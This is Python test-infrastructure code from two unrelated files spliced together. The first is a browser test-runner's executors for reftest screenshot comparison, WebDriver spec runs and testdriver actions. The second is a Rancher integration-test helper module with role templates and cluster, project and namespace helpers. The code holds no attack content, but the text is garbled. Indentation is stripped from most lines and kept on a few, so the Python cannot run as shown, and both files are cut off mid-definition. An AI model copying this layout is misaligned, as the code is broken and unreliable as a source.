message = text_type(getattr(e, "message", ""))
if message:
message += "\n"
        message += traceback.format_exc()
return test.result_cls(status, message), []
def wait(self):
self.protocol.base.wait()
class TestharnessExecutor(TestExecutor):
convert_result = testharness_result_converter
class RefTestExecutor(TestExecutor):
convert_result = reftest_result_converter
def __init__(self, browser, server_config, timeout_multiplier=1, screenshot_cache=None,
debug_info=None, **kwargs):
TestExecutor.__init__(self, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.screenshot_cache = screenshot_cache
class CrashtestExecutor(TestExecutor):
convert_result = crashtest_result_converter
class RefTestImplementation(object):
def __init__(self, executor):
self.timeout_multiplier = executor.timeout_multiplier
self.executor = executor
# Cache of url:(screenshot hash, screenshot). Typically the
# screenshot is None, but we set this value if a test fails
# and the screenshot was taken from the cache so that we may
# retrieve the screenshot from the cache directly in the future
self.screenshot_cache = self.executor.screenshot_cache
self.message = None
def setup(self):
pass
def teardown(self):
pass
@property
def logger(self):
return self.executor.logger
def get_hash(self, test, viewport_size, dpi):
key = (test.url, viewport_size, dpi)
if key not in self.screenshot_cache:
success, data = self.executor.screenshot(test, viewport_size, dpi)
if not success:
return False, data
screenshot = data
hash_value = hash_screenshot(data)
self.screenshot_cache[key] = (hash_value, screenshot)
rv = (hash_value, screenshot)
else:
rv = self.screenshot_cache[key]
self.message.append("%s %s" % (test.url, rv[0]))
return True, rv
def reset(self):
self.screenshot_cache.clear()
def is_pass(self, hashes, screenshots, urls, relation, fuzzy):
assert relation in ("==", "!=")
if not fuzzy or fuzzy == ((0,0), (0,0)):
equal = hashes[0] == hashes[1]
# sometimes images can have different hashes, but pixels can be identical.
if not equal:
self.logger.info("Image hashes didn't match, checking pixel differences")
max_per_channel, pixels_different = self.get_differences(screenshots, urls)
equal = pixels_different == 0 and max_per_channel == 0
else:
max_per_channel, pixels_different = self.get_differences(screenshots, urls)
allowed_per_channel, allowed_different = fuzzy
self.logger.info("Allowed %s pixels different, maximum difference per channel %s" %
("-".join(str(item) for item in allowed_different),
"-".join(str(item) for item in allowed_per_channel)))
equal = ((pixels_different == 0 and allowed_different[0] == 0) or
(max_per_channel == 0 and allowed_per_channel[0] == 0) or
(allowed_per_channel[0] <= max_per_channel <= allowed_per_channel[1] and
allowed_different[0] <= pixels_different <= allowed_different[1]))
return equal if relation == "==" else not equal
def get_differences(self, screenshots, urls):
from PIL import Image, ImageChops, ImageStat
lhs = Image.open(io.BytesIO(base64.b64decode(screenshots[0]))).convert("RGB")
rhs = Image.open(io.BytesIO(base64.b64decode(screenshots[1]))).convert("RGB")
self.check_if_solid_color(lhs, urls[0])
self.check_if_solid_color(rhs, urls[1])
diff = ImageChops.difference(lhs, rhs)
minimal_diff = diff.crop(diff.getbbox())
mask = minimal_diff.convert("L", dither=None)
stat = ImageStat.Stat(minimal_diff, mask)
per_channel = max(item[1] for item in stat.extrema)
count = stat.count[0]
self.logger.info("Found %s pixels different, maximum difference per channel %s" %
(count, per_channel))
return per_channel, count
def check_if_solid_color(self, image, url):
extrema = image.getextrema()
if all(min == max for min, max in extrema):
color = ''.join('%02X' % value for value, _ in extrema)
self.message.append("Screenshot is solid color 0x%s for %s\n" % (color, url))
def run_test(self, test):
viewport_size = test.viewport_size
dpi = test.dpi
self.message = []
        # Depth-first search of the reference tree, with the goal
        # of reaching a leaf node with only pass results
stack = list(((test, item[0]), item[1]) for item in reversed(test.references))
while stack:
hashes = [None, None]
screenshots = [None, None]
urls = [None, None]
nodes, relation = stack.pop()
fuzzy = self.get_fuzzy(test, nodes, relation)
for i, node in enumerate(nodes):
success, data = self.get_hash(node, viewport_size, dpi)
if success is False:
return {"status": data[0], "message": data[1]}
hashes[i], screenshots[i] = data
urls[i] = node.url
if self.is_pass(hashes, screenshots, urls, relation, fuzzy):
fuzzy = self.get_fuzzy(test, nodes, relation)
if nodes[1].references:
stack.extend(list(((nodes[1], item[0]), item[1]) for item in reversed(nodes[1].references)))
else:
# We passed
return {"status":"PASS", "message": None}
# We failed, so construct a failure message
for i, (node, screenshot) in enumerate(zip(nodes, screenshots)):
if screenshot is None:
success, screenshot = self.retake_screenshot(node, viewport_size, dpi)
if success:
screenshots[i] = screenshot
log_data = [
{"url": nodes[0].url, "screenshot": screenshots[0], "hash": hashes[0]},
relation,
{"url": nodes[1].url, "screenshot": screenshots[1], "hash": hashes[1]},
]
return {"status": "FAIL",
"message": "\n".join(self.message),
"extra": {"reftest_screenshots": log_data}}
def get_fuzzy(self, root_test, test_nodes, relation):
full_key = tuple([item.url for item in test_nodes] + [relation])
ref_only_key = test_nodes[1].url
fuzzy_override = root_test.fuzzy_override
fuzzy = test_nodes[0].fuzzy
sources = [fuzzy_override, fuzzy]
keys = [full_key, ref_only_key, None]
value = None
for source in sources:
for key in keys:
if key in source:
value = source[key]
break
if value:
break
return value
def retake_screenshot(self, node, viewport_size, dpi):
success, data = self.executor.screenshot(node, viewport_size, dpi)
if not success:
return False, data
key = (node.url, viewport_size, dpi)
hash_val, _ = self.screenshot_cache[key]
self.screenshot_cache[key] = hash_val, data
return True, data
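# Two illustrative sketches for the fuzzy-matching logic above (all values are
# hypothetical, not taken from any real test). The first mirrors the range
# check in RefTestImplementation.is_pass: fuzzy is a pair of (min, max) ranges,
# first for the per-channel difference and then for the number of differing
# pixels. The second mirrors the lookup precedence in get_fuzzy: an entry in
# fuzzy_override wins over the test node's own fuzzy data, and the full
# (test url, ref url, relation) key wins over a ref-url-only key.
def _example_fuzzy_bounds():
    allowed_per_channel, allowed_different = ((0, 2), (0, 10))
    max_per_channel, pixels_different = 1, 4  # pretend measurement
    return (allowed_per_channel[0] <= max_per_channel <= allowed_per_channel[1] and
            allowed_different[0] <= pixels_different <= allowed_different[1])
def _example_get_fuzzy_precedence():
    fuzzy_override = {("/a.html", "/a-ref.html", "=="): ((0, 1), (0, 5))}
    fuzzy = {"/a-ref.html": ((0, 3), (0, 20))}
    for source in (fuzzy_override, fuzzy):
        for key in (("/a.html", "/a-ref.html", "=="), "/a-ref.html", None):
            if key in source:
                return source[key]  # ((0, 1), (0, 5)) wins here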
class WdspecExecutor(TestExecutor):
convert_result = pytest_result_converter
protocol_cls = None
def __init__(self, browser, server_config, webdriver_binary,
webdriver_args, timeout_multiplier=1, capabilities=None,
debug_info=None, **kwargs):
self.do_delayed_imports()
TestExecutor.__init__(self, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.webdriver_binary = webdriver_binary
self.webdriver_args = webdriver_args
self.timeout_multiplier = timeout_multiplier
self.capabilities = capabilities
self.protocol = self.protocol_cls(self, browser)
def is_alive(self):
return self.protocol.is_alive()
def on_environment_change(self, new_environment):
pass
def do_test(self, test):
timeout = test.timeout * self.timeout_multiplier + self.extra_timeout
success, data = WdspecRun(self.do_wdspec,
self.protocol.session_config,
test.abs_path,
timeout).run()
if success:
return self.convert_result(test, data)
return (test.result_cls(*data), [])
def do_wdspec(self, session_config, path, timeout):
return pytestrunner.run(path,
self.server_config,
session_config,
timeout=timeout)
def do_delayed_imports(self):
global pytestrunner
from . import pytestrunner
class WdspecRun(object):
def __init__(self, func, session, path, timeout):
self.func = func
self.result = (None, None)
self.session = session
self.path = path
self.timeout = timeout
self.result_flag = threading.Event()
def run(self):
"""Runs function in a thread and interrupts it if it exceeds the
given timeout. Returns (True, (Result, [SubtestResult ...])) in
case of success, or (False, (status, extra information)) in the
event of failure.
"""
executor = threading.Thread(target=self._run)
executor.start()
self.result_flag.wait(self.timeout)
if self.result[1] is None:
self.result = False, ("EXTERNAL-TIMEOUT", None)
return self.result
def _run(self):
try:
self.result = True, self.func(self.session, self.path, self.timeout)
except (socket.timeout, IOError):
self.result = False, ("CRASH", None)
except Exception as e:
            message = getattr(e, "message", "")
            if message:
                message += "\n"
            message += traceback.format_exc()
self.result = False, ("INTERNAL-ERROR", message)
finally:
self.result_flag.set()
class ConnectionlessBaseProtocolPart(BaseProtocolPart):
def load(self, url):
pass
def execute_script(self, script, asynchronous=False):
pass
def set_timeout(self, timeout):
pass
def wait(self):
pass
def set_window(self, handle):
pass
class ConnectionlessProtocol(Protocol):
implements = [ConnectionlessBaseProtocolPart]
def connect(self):
pass
def after_connect(self):
pass
class WebDriverProtocol(Protocol):
server_cls = None
implements = [ConnectionlessBaseProtocolPart]
def __init__(self, executor, browser):
Protocol.__init__(self, executor, browser)
self.webdriver_binary = executor.webdriver_binary
self.webdriver_args = executor.webdriver_args
self.capabilities = self.executor.capabilities
self.session_config = None
self.server = None
def connect(self):
"""Connect to browser via the HTTP server."""
self.server = self.server_cls(
self.logger,
binary=self.webdriver_binary,
args=self.webdriver_args)
self.server.start(block=False)
self.logger.info(
"WebDriver HTTP server listening at %s" % self.server.url)
self.session_config = {"host": self.server.host,
"port": self.server.port,
"capabilities": self.capabilities}
def after_connect(self):
pass
def teardown(self):
if self.server is not None and self.server.is_alive():
self.server.stop()
def is_alive(self):
"""Test that the connection is still alive.
Because the remote communication happens over HTTP we need to
make an explicit request to the remote. It is allowed for
WebDriver spec tests to not have a WebDriver session, since this
may be what is tested.
An HTTP request to an invalid path that results in a 404 is
proof enough to us that the server is alive and kicking.
"""
conn = HTTPConnection(self.server.host, self.server.port)
conn.request("HEAD", self.server.base_path + "invalid")
res = conn.getresponse()
return res.status == 404
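# A standalone sketch of the liveness check described in
# WebDriverProtocol.is_alive (host and port are assumptions for illustration):
# a HEAD request to a deliberately bogus path where even a 404 proves that the
# WebDriver HTTP server is still answering requests.
def _example_webdriver_server_alive(host="127.0.0.1", port=4444):
    conn = HTTPConnection(host, port)
    conn.request("HEAD", "/session/invalid")
    return conn.getresponse().status == 404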
class CallbackHandler(object):
"""Handle callbacks from testdriver-using tests.
The default implementation here makes sense for things that are roughly like
WebDriver. Things that are more different to WebDriver may need to create a
fully custom implementation."""
unimplemented_exc = (NotImplementedError,)
def __init__(self, logger, protocol, test_window):
self.protocol = protocol
self.test_window = test_window
self.logger = logger
self.callbacks = {
"action": self.process_action,
"complete": self.process_complete
}
self.actions = {
"click": ClickAction(self.logger, self.protocol),
"send_keys": SendKeysAction(self.logger, self.protocol),
"action_sequence": ActionSequenceAction(self.logger, self.protocol),
"generate_test_report": GenerateTestReportAction(self.logger, self.protocol),
"set_permission": SetPermissionAction(self.logger, self.protocol),
"add_virtual_authenticator": AddVirtualAuthenticatorAction(self.logger, self.protocol),
"remove_virtual_authenticator": RemoveVirtualAuthenticatorAction(self.logger, self.protocol),
"add_credential": AddCredentialAction(self.logger, self.protocol),
"get_credentials": GetCredentialsAction(self.logger, self.protocol),
"remove_credential": RemoveCredentialAction(self.logger, self.protocol),
"remove_all_credentials": RemoveAllCredentialsAction(self.logger, self.protocol),
"set_user_verified": SetUserVerifiedAction(self.logger, self.protocol),
}
def __call__(self, result):
url, command, payload = result
self.logger.debug("Got async callback: %s" % result[1])
try:
callback = self.callbacks[command]
except KeyError:
raise ValueError("Unknown callback type %r" % result[1])
return callback(url, payload)
def process_complete(self, url, payload):
rv = [strip_server(url)] + payload
return True, rv
def process_action(self, url, payload):
action = payload["action"]
self.logger.debug("Got action: %s" % action)
try:
action_handler = self.actions[action]
except KeyError:
raise ValueError("Unknown action %s" % action)
try:
result = action_handler(payload)
except self.unimplemented_exc:
self.logger.warning("Action %s not implemented" % action)
self._send_message("complete", "error", "Action %s not implemented" % action)
except Exception:
self.logger.warning("Action %s failed" % action)
self.logger.warning(traceback.format_exc())
self._send_message("complete", "error")
raise
else:
self.logger.debug("Action %s completed with result %s" % (action, result))
return_message = {"result": result}
self._send_message("complete", "success", json.dumps(return_message))
return False, None
def _send_message(self, message_type, status, message=None):
self.protocol.testdriver.send_message(message_type, status, message=message)
class ClickAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
selector = payload["selector"]
element = self.protocol.select.element_by_selector(selector)
self.logger.debug("Clicking element: %s" % selector)
self.protocol.click.element(element)
class SendKeysAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
selector = payload["selector"]
keys = payload["keys"]
element = self.protocol.select.element_by_selector(selector)
self.logger.debug("Sending keys to element: %s" % selector)
self.protocol.send_keys.send_keys(element, keys)
class ActionSequenceAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
# TODO: some sort of shallow error checking
actions = payload["actions"]
for actionSequence in actions:
if actionSequence["type"] == "pointer":
for action in actionSequence["actions"]:
if (action["type"] == "pointerMove" and
isinstance(action["origin"], dict)):
action["origin"] = self.get_element(action["origin"]["selector"], action["frame"]["frame"])
self.protocol.action_sequence.send_actions({"actions": actions})
def get_element(self, element_selector, frame):
element = self.protocol.select.element_by_selector(element_selector, frame)
return element
class GenerateTestReportAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
message = payload["message"]
self.logger.debug("Generating test report: %s" % message)
self.protocol.generate_test_report.generate_test_report(message)
class SetPermissionAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
permission_params = payload["permission_params"]
descriptor = permission_params["descriptor"]
name = descriptor["name"]
state = permission_params["state"]
one_realm = permission_params.get("oneRealm", False)
self.logger.debug("Setting permission %s to %s, oneRealm=%s" % (name, state, one_realm))
self.protocol.set_permission.set_permission(descriptor, state, one_realm)
class AddVirtualAuthenticatorAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
self.logger.debug("Adding virtual authenticator")
config = payload["config"]
authenticator_id = self.protocol.virtual_authenticator.add_virtual_authenticator(config)
self.logger.debug("Authenticator created with ID %s" % authenticator_id)
return authenticator_id
class RemoveVirtualAuthenticatorAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
authenticator_id = payload["authenticator_id"]
self.logger.debug("Removing virtual authenticator %s" % authenticator_id)
return self.protocol.virtual_authenticator.remove_virtual_authenticator(authenticator_id)
class AddCredentialAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
authenticator_id = payload["authenticator_id"]
credential = payload["credential"]
self.logger.debug("Adding credential to virtual authenticator %s " % authenticator_id)
return self.protocol.virtual_authenticator.add_credential(authenticator_id, credential)
class GetCredentialsAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
authenticator_id = payload["authenticator_id"]
self.logger.debug("Getting credentials from virtual authenticator %s " % authenticator_id)
return self.protocol.virtual_authenticator.get_credentials(authenticator_id)
class RemoveCredentialAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
authenticator_id = payload["authenticator_id"]
credential_id = payload["credential_id"]
self.logger.debug("Removing credential %s from authenticator %s" % (credential_id, authenticator_id))
return self.protocol.virtual_authenticator.remove_credential(authenticator_id, credential_id)
class RemoveAllCredentialsAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
authenticator_id = payload["authenticator_id"]
self.logger.debug("Removing all credentials from authenticator %s" % authenticator_id)
return self.protocol.virtual_authenticator.remove_all_credentials(authenticator_id)
class SetUserVerifiedAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
authenticator_id = payload["authenticator_id"]
uv = payload["uv"]
self.logger.debug(
"Setting user verified flag on authenticator %s to %s" % (authenticator_id, uv["isUserVerified"]))
return self.protocol.virtual_authenticator.set_user_verified(authenticator_id, uv)
|
common.py
|
import inspect
import json
import os
import random
import subprocess
import ssl
import time
import requests
import ast
import paramiko
import rancher
import pytest
from urllib.parse import urlparse
from rancher import ApiError
from lib.aws import AmazonWebServices
from copy import deepcopy
from threading import Lock
from threading import Thread
import websocket
import base64
DEFAULT_TIMEOUT = 120
DEFAULT_CATALOG_TIMEOUT = 15
DEFAULT_MONITORING_TIMEOUT = 180
DEFAULT_CLUSTER_STATE_TIMEOUT = 320
DEFAULT_MULTI_CLUSTER_APP_TIMEOUT = 300
DEFAULT_APP_DELETION_TIMEOUT = 360
DEFAULT_APP_V2_TIMEOUT = 60
CATTLE_TEST_URL = os.environ.get('CATTLE_TEST_URL', "")
CATTLE_API_URL = CATTLE_TEST_URL + "/v3"
CATTLE_AUTH_URL = \
CATTLE_TEST_URL + "/v3-public/localproviders/local?action=login"
ADMIN_TOKEN = os.environ.get('ADMIN_TOKEN', "None")
USER_TOKEN = os.environ.get('USER_TOKEN', "None")
USER_PASSWORD = os.environ.get('USER_PASSWORD', "None")
ADMIN_PASSWORD = os.environ.get('ADMIN_PASSWORD', "None")
kube_fname = os.path.join(os.path.dirname(os.path.realpath(__file__)),
"k8s_kube_config")
MACHINE_TIMEOUT = float(os.environ.get('RANCHER_MACHINE_TIMEOUT', "1200"))
HARDENED_CLUSTER = ast.literal_eval(
os.environ.get('RANCHER_HARDENED_CLUSTER', "False"))
TEST_OS = os.environ.get('RANCHER_TEST_OS', "linux")
TEST_IMAGE = os.environ.get('RANCHER_TEST_IMAGE', "sangeetha/mytestcontainer")
TEST_IMAGE_PORT = os.environ.get('RANCHER_TEST_IMAGE_PORT', "80")
TEST_IMAGE_NGINX = os.environ.get('RANCHER_TEST_IMAGE_NGINX', "nginx")
TEST_IMAGE_OS_BASE = os.environ.get('RANCHER_TEST_IMAGE_OS_BASE', "ubuntu")
if TEST_OS == "windows":
DEFAULT_TIMEOUT = 300
skip_test_windows_os = pytest.mark.skipif(
TEST_OS == "windows",
    reason='Tests skipped for clusters that include Windows nodes')
skip_test_hardened = pytest.mark.skipif(
HARDENED_CLUSTER,
    reason='Tests skipped because the cluster is hardened')
UPDATE_KDM = ast.literal_eval(os.environ.get('RANCHER_UPDATE_KDM', "False"))
KDM_URL = os.environ.get("RANCHER_KDM_URL", "")
CLUSTER_NAME = os.environ.get("RANCHER_CLUSTER_NAME", "")
RANCHER_CLEANUP_CLUSTER = \
ast.literal_eval(os.environ.get('RANCHER_CLEANUP_CLUSTER', "True"))
env_file = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"rancher_env.config")
AWS_SSH_KEY_NAME = os.environ.get("AWS_SSH_KEY_NAME")
AWS_ACCESS_KEY_ID = os.environ.get("AWS_ACCESS_KEY_ID")
AWS_SECRET_ACCESS_KEY = os.environ.get("AWS_SECRET_ACCESS_KEY")
AWS_REGION = os.environ.get("AWS_REGION")
AWS_SUBNET = os.environ.get("AWS_SUBNET")
AWS_VPC = os.environ.get("AWS_VPC")
AWS_SG = os.environ.get("AWS_SG")
AWS_ZONE = os.environ.get("AWS_ZONE")
AWS_IAM_PROFILE = os.environ.get("AWS_IAM_PROFILE", "")
AWS_S3_BUCKET_NAME = os.environ.get("AWS_S3_BUCKET_NAME", "")
AWS_S3_BUCKET_FOLDER_NAME = os.environ.get("AWS_S3_BUCKET_FOLDER_NAME", "")
LINODE_ACCESSKEY = os.environ.get('RANCHER_LINODE_ACCESSKEY', "None")
NFS_SERVER_MOUNT_PATH = "/nfs"
TEST_RBAC = ast.literal_eval(os.environ.get('RANCHER_TEST_RBAC', "False"))
if_test_rbac = pytest.mark.skipif(TEST_RBAC is False,
reason='rbac tests are skipped')
TEST_ALL_SNAPSHOT = ast.literal_eval(
os.environ.get('RANCHER_TEST_ALL_SNAPSHOT', "False")
)
if_test_all_snapshot = \
pytest.mark.skipif(TEST_ALL_SNAPSHOT is False,
reason='Snapshots check tests are skipped')
DATA_SUBDIR = os.path.join(os.path.dirname(os.path.realpath(__file__)),
'resource')
# As of release 2.4 default rke scan profile is "rke-cis-1.4"
CIS_SCAN_PROFILE = os.environ.get('RANCHER_CIS_SCAN_PROFILE', "rke-cis-1.4")
# here are all supported roles for RBAC testing
CLUSTER_MEMBER = "cluster-member"
CLUSTER_OWNER = "cluster-owner"
PROJECT_MEMBER = "project-member"
PROJECT_OWNER = "project-owner"
PROJECT_READ_ONLY = "read-only"
rbac_data = {
"project": None,
"namespace": None,
"workload": None,
"p_unshared": None,
"ns_unshared": None,
"wl_unshared": None,
"users": {
CLUSTER_OWNER: {},
CLUSTER_MEMBER: {},
PROJECT_OWNER: {},
PROJECT_MEMBER: {},
PROJECT_READ_ONLY: {},
}
}
auth_rbac_data = {
"project": None,
"namespace": None,
"users": {}
}
# here are the global role templates used for
# testing globalRoleBinding and groupRoleBinding
TEMPLATE_MANAGE_CATALOG = {
"newUserDefault": "false",
"rules": [
{
"type": "/v3/schemas/policyRule",
"apiGroups": [
"management.cattle.io"
],
"verbs": [
"*"
],
"resources": [
"catalogs",
"templates",
"templateversions"
]
}
],
"name": "gr-test-manage-catalog",
}
TEMPLATE_LIST_CLUSTER = {
"newUserDefault": "false",
"rules": [
{
"type": "/v3/schemas/policyRule",
"apiGroups": [
"management.cattle.io"
],
"verbs": [
"get",
"list",
"watch"
],
"resources": [
"clusters"
]
}
],
"name": "gr-test-list-cluster",
}
# this is used when testing users from an auth provider
AUTH_PROVIDER = os.environ.get('RANCHER_AUTH_PROVIDER', "")
if AUTH_PROVIDER not in ["activeDirectory", "freeIpa", "openLdap", ""]:
pytest.fail("Invalid RANCHER_AUTH_PROVIDER. Please provide one of: "
"activeDirectory, freeIpa, or openLdap (case sensitive).")
NESTED_GROUP_ENABLED = ast.literal_eval(
os.environ.get('RANCHER_NESTED_GROUP_ENABLED', "False"))
# Admin Auth username and the shared password for all auth users
AUTH_USER_PASSWORD = os.environ.get('RANCHER_AUTH_USER_PASSWORD', "")
# the link to log in as an auth user
LOGIN_AS_AUTH_USER_URL = \
CATTLE_TEST_URL + "/v3-public/" \
+ AUTH_PROVIDER + "Providers/" \
+ AUTH_PROVIDER.lower() + "?action=login"
CATTLE_AUTH_PRINCIPAL_URL = CATTLE_TEST_URL + "/v3/principals?action=search"
# This is used for nested groups when a third-party auth provider is enabled
nested_group = {
"auth_info": None,
"users": None,
"group_dic": None,
"groups": None
}
auth_requirements = not AUTH_PROVIDER or not AUTH_USER_PASSWORD
if_test_group_rbac = pytest.mark.skipif(
auth_requirements,
    reason='Group RBAC tests are skipped. '
'Required AUTH env variables '
'have not been set.'
)
# -----------------------------------------------------------------------------
# global variables from test_create_ha.py
test_run_id = "test" + str(random.randint(10000, 99999))
RANCHER_HOSTNAME_PREFIX = os.environ.get("RANCHER_HOSTNAME_PREFIX",
test_run_id)
CERT_MANAGER_VERSION = os.environ.get("RANCHER_CERT_MANAGER_VERSION", "v1.0.1")
# -----------------------------------------------------------------------------
# this is used for testing rbac v2
test_rbac_v2 = os.environ.get("RANCHER_TEST_RBAC_V2", "False")
if_test_rbac_v2 = pytest.mark.skipif(test_rbac_v2 != "True",
reason='test for rbac v2 is skipped')
def is_windows(os_type=TEST_OS):
return os_type == "windows"
def random_str():
return 'random-{0}-{1}'.format(random_num(), int(time.time()))
def random_num():
return random.randint(0, 1000000)
def random_int(start, end):
return random.randint(start, end)
def random_test_name(name="test"):
return name + "-" + str(random_int(10000, 99999))
def get_cluster_client_for_token_v1(cluster_id, token):
url = CATTLE_TEST_URL + "/k8s/clusters/" + cluster_id + "/v1/schemas"
return rancher.Client(url=url, token=token, verify=False)
def get_admin_client():
return rancher.Client(url=CATTLE_API_URL, token=ADMIN_TOKEN, verify=False)
def get_user_client():
return rancher.Client(url=CATTLE_API_URL, token=USER_TOKEN, verify=False)
def get_client_for_token(token, url=CATTLE_API_URL):
return rancher.Client(url=url, token=token, verify=False)
def get_project_client_for_token(project, token):
p_url = project.links['self'] + '/schemas'
p_client = rancher.Client(url=p_url, token=token, verify=False)
return p_client
def get_cluster_client_for_token(cluster, token):
c_url = cluster.links['self'] + '/schemas'
c_client = rancher.Client(url=c_url, token=token, verify=False)
return c_client
def up(cluster, token):
c_url = cluster.links['self'] + '/schemas'
c_client = rancher.Client(url=c_url, token=token, verify=False)
return c_client
def wait_state(client, obj, state, timeout=DEFAULT_TIMEOUT):
wait_for(lambda: client.reload(obj).state == state, timeout)
return client.reload(obj)
def wait_for_condition(client, resource, check_function, fail_handler=None,
timeout=DEFAULT_TIMEOUT):
start = time.time()
resource = client.reload(resource)
while not check_function(resource):
if time.time() - start > timeout:
exceptionMsg = 'Timeout waiting for ' + resource.baseType + \
' to satisfy condition: ' + \
inspect.getsource(check_function)
if fail_handler:
exceptionMsg = exceptionMsg + fail_handler(resource)
raise Exception(exceptionMsg)
time.sleep(.5)
resource = client.reload(resource)
return resource
def wait_for(callback, timeout=DEFAULT_TIMEOUT, timeout_message=None):
start = time.time()
ret = callback()
while ret is None or ret is False:
time.sleep(.5)
if time.time() - start > timeout:
if timeout_message:
raise Exception(timeout_message)
else:
raise Exception('Timeout waiting for condition')
ret = callback()
return ret
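# A minimal usage sketch for wait_for (the callback is a stand-in): the helper
# polls every half second until the callable returns a truthy value, raising
# once the timeout elapses.
def _example_wait_for(deadline_seconds=3):
    deadline = time.time() + deadline_seconds
    return wait_for(lambda: time.time() > deadline or None,
                    timeout=DEFAULT_TIMEOUT,
                    timeout_message="example condition never became true")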
def random_name():
return "test" + "-" + str(random_int(10000, 99999))
def get_setting_value_by_name(name):
settings_url = CATTLE_API_URL + "/settings/" + name
head = {'Authorization': 'Bearer ' + ADMIN_TOKEN}
response = requests.get(settings_url, verify=False, headers=head)
return response.json()["value"]
# Return value is negative if v1 < v2, zero if v1 == v2 and positive if v1 > v2
def compare_versions(v1, v2):
if tuple(map(int, (v1.split(".")))) > tuple(map(int, (v2.split(".")))):
return 1
elif tuple(map(int, (v1.split(".")))) < tuple(map(int, (v2.split(".")))):
return -1
else:
return 0
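# A small usage sketch for compare_versions (the version strings are arbitrary
# examples): components are compared numerically, so "1.18.3" is newer than
# "1.9.7" even though it sorts lower lexically.
def _example_compare_versions():
    assert compare_versions("1.18.3", "1.9.7") == 1
    assert compare_versions("1.9.7", "1.18.3") == -1
    assert compare_versions("1.18.3", "1.18.3") == 0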
def create_project_and_ns(token, cluster, project_name=None, ns_name=None):
server_url = cluster.links['self'].split("/clusters")[0]
client = get_client_for_token(token, server_url)
p = create_project(client, cluster, project_name)
c_client = get_cluster_client_for_token(cluster, token)
ns = create_ns(c_client, cluster, p, ns_name)
return p, ns
def create_project(client, cluster, project_name=None):
if project_name is None:
project_name = random_name()
p = client.create_project(name=project_name,
clusterId=cluster.id)
time.sleep(5)
p = wait_until_available(client, p)
assert p.state == 'active'
return p
def create_project_with_pspt(client, cluster, pspt):
p = client.create_project(name=random_name(),
clusterId=cluster.id)
p = wait_until_available(client, p)
assert p.state == 'active'
return set_pspt_for_project(p, client, pspt)
def set_pspt_for_project(project, client, pspt):
project.setpodsecuritypolicytemplate(podSecurityPolicyTemplateId=pspt.id)
project = wait_until_available(client, project)
assert project.state == 'active'
return project
def create_ns(client, cluster, project, ns_name=None):
if ns_name is None:
ns_name = random_name()
ns = client.create_namespace(name=ns_name,
clusterId=cluster.id,
projectId=project.id)
wait_for_ns_to_become_active(client, ns)
ns = client.reload(ns)
assert ns.state == 'active'
return ns
def assign_members_to_cluster(client, user, cluster, role_template_id):
crtb = client.create_cluster_role_template_binding(
clusterId=cluster.id,
roleTemplateId=role_template_id,
subjectKind="User",
userId=user.id)
return crtb
def assign_members_to_project(client, user, project, role_template_id):
prtb = client.create_project_role_template_binding(
projectId=project.id,
roleTemplateId=role_template_id,
subjectKind="User",
userId=user.id)
return prtb
def change_member_role_in_cluster(client, user, crtb, role_template_id):
crtb = client.update(
crtb,
roleTemplateId=role_template_id,
userId=user.id)
return crtb
def change_member_role_in_project(client, user, prtb, role_template_id):
prtb = client.update(
prtb,
roleTemplateId=role_template_id,
userId=user.id)
return prtb
def create_kubeconfig(cluster, file_name=kube_fname):
generateKubeConfigOutput = cluster.generateKubeconfig()
print(generateKubeConfigOutput.config)
file = open(file_name, "w")
file.write(generateKubeConfigOutput.config)
file.close()
def validate_psp_error_worklaod(p_client, workload, error_message):
workload = wait_for_wl_transitioning(p_client, workload)
assert workload.state == "updating"
assert workload.transitioning == "error"
print(workload.transitioningMessage)
assert error_message in workload.transitioningMessage
def validate_all_workload_image_from_rancher(project_client, ns, pod_count=1,
ignore_pod_count=False,
deployment_list=None,
daemonset_list=None,
cronjob_list=None, job_list=None):
if cronjob_list is None:
cronjob_list = []
if daemonset_list is None:
daemonset_list = []
if deployment_list is None:
deployment_list = []
if job_list is None:
job_list = []
workload_list = deployment_list + daemonset_list + cronjob_list + job_list
wls = [dep.name for dep in project_client.list_workload(namespaceId=ns.id).data]
assert len(workload_list) == len(wls), \
"Expected {} workload(s) to be present in {} namespace " \
"but there were {}".format(len(workload_list), ns.name, len(wls))
for workload_name in workload_list:
workloads = project_client.list_workload(name=workload_name,
namespaceId=ns.id).data
assert len(workloads) == workload_list.count(workload_name), \
"Expected {} workload(s) to be present with name {} " \
"but there were {}".format(workload_list.count(workload_name),
workload_name, len(workloads))
for workload in workloads:
for container in workload.containers:
assert str(container.image).startswith("rancher/")
if workload_name in deployment_list:
validate_workload(project_client, workload, "deployment",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
deployment_list.remove(workload_name)
if workload_name in daemonset_list:
validate_workload(project_client, workload, "daemonSet",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
daemonset_list.remove(workload_name)
if workload_name in cronjob_list:
validate_workload(project_client, workload, "cronJob",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
cronjob_list.remove(workload_name)
if workload_name in job_list:
validate_workload(project_client, workload, "job",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
job_list.remove(workload_name)
    # Final assertion to ensure all expected workloads have been validated
    assert not deployment_list + daemonset_list + cronjob_list + job_list
def validate_workload(p_client, workload, type, ns_name, pod_count=1,
